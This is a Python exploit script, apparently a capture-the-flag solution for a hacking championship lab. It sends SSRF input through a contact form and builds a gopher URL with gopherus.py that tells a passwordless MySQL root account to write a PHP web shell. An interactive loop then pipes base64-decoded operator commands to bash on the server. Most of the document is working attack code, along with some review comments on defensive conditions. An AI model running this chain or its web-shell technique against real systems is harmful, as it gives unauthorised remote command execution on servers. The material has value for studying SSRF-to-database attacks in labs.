Created
October 19, 2020 23:16
Ultimate Hacker Championship 17° Finals - Exploit Script
import requests | |
import string | |
import base64 | |
def attempt(payload):
    """Submit *payload* in the ``website`` field of the contact form and echo the reply.

    The other form fields are fixed filler values. A reply containing
    ``'went wrong.'`` is treated as a failed submission and the same payload
    is sent again; any other reply is printed with characters outside
    ``string.printable`` replaced by spaces.

    NOTE(review): presumably the endpoint dereferences the ``website`` value
    server-side; confirm against the application. If so, the server-side fix
    is to validate the URL scheme and destination before any fetch.
    """
    form = {
        "contactName": "aa",
        "contactEmail": "aa@a.com",
        "website": payload,
        "contactMessage": "A" * 40,
    }
    # Sent with requests' defaults: no timeout is passed.
    response = requests.post('https://uhclabs.labdepentest.com.br/inc/sendEmail.php', data=form)
    body = response.text

    if 'went wrong.' in body:
        print("error")
        # NOTE(review): retry is plain recursion with no bound or delay; a
        # persistently failing endpoint ends in RecursionError.
        attempt(payload)
        return

    # Keep the terminal readable: anything outside string.printable becomes a space.
    cleaned = ''.join(ch if ch in string.printable else ' ' for ch in body)
    print(cleaned, end='')
# Interactive loop: each line typed by the operator is wrapped in several
# layers (shell -> PHP -> SQL -> gopher URL) and handed to attempt().
#
# Conditions this chain depends on, i.e. what a defender removes:
#   * the form's `website` value reaching a server-side fetch that accepts
#     non-HTTP schemes (presumably; confirm against the application);
#   * a MySQL account usable without a password (the generator is given only
#     the user name `root`);
#   * that account being allowed to write files (FILE privilege /
#     secure_file_priv) into a directory where the file is then executed
#     as PHP.
while True:
    payload = input('> ')
    print(payload)
    # Base64 keeps the typed command to a fixed alphabet, presumably so that it
    # survives the nested quoting below unchanged.
    payload = base64.b64encode(payload.encode()).decode()
    # SQL statement that writes a one-line PHP file to /uhc/celesian.php via
    # SELECT ... INTO DUMPFILE; the PHP decodes the base64 text and pipes it to bash.
    write_file = """select '<?php system(\\"echo %s | base64 -d | bash\\");' into dumpfile '/uhc/celesian.php';""" % payload
    payload = write_file
    # Shell pipeline: feed the user name and the SQL to gopherus.py on stdin,
    # keep the line containing "gopher:" and drop its first five characters.
    gen = "printf 'root\n'\"%s\n\" | python gopherus.py --exploit mysql | grep gopher: | sed 's/^.....//g'| cat" % payload
    # Runs `gen` through the local shell and captures its stdout.
    payload = __import__("os").popen(gen).read()
    # Keep only the text before the first ANSI reset sequence followed by a newline.
    payload = payload.split('\x1b[0m\n')[0]
    print(repr(payload))
    attempt(payload)